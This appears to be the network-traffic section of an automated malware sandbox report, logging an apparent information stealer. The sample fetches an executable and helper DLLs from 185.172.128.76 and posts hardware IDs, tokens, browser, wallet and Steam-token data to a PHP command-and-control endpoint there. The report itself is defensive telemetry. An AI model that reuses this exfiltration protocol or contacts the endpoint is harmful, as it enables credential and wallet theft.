00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:09:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"browsers------HJDBFBKKJDHJKECBGDAK--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"plugins------FCAFIJJJKEGIECAKKEHI--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.172.128.76Content-Length: 6183Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"------HIDGCFBFBFBKEBGCAFCG--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"wallets------AAEGHJKJKKJDHIDHJKJD--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="message"files------DGHDHIDGHIDGIECBKKJJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file"------IEHDBAAFIDGDAAAAAAAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.172.128.76Content-Length: 124911Connection: Keep-AliveCache-Control: no-cache
